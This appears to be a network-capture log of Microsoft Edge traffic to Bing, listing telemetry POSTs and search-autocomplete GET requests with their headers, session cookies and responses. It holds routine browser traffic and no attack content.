referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306898.7f11850
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22mapsOptOut%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22mapsOptOut%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306898.7f11871
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 27851
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306899.7f11d32
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 633
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306902.7f12cbc
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 2812
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:28 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306908.7f14dd0
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 2737
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306912.7f1650d
GET

https://www.bing.com/qbox?query=d&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=054b6f8b047b48b38ec55fbf2efc2c02&oit=1&cp=1&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=d&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=054b6f8b047b48b38ec55fbf2efc2c02&oit=1&cp=1&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 423
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a21e2f34c62a957f2e5228338a3
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-iQ+OmEsQWktCYc2Dwi17VFVHrahRQcTZgQ2KDmmPid0='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:33 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:33 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=0B5259C4F941695D3AE34C8FF82E6870; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:33 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306913.7f16876
GET

https://www.bing.com/qbox?query=do&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=a14190e59dc340209069b860e2bbcda2&oit=1&cp=2&pgcl=9

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=do&language=en-US&pt=EdgBox&cvid=3e9d1f0e90bd4b45aaa059bd0cd1dc49&ig=a14190e59dc340209069b860e2bbcda2&oit=1&cp=2&pgcl=9 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 359
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2231c846788590f0461ac334db
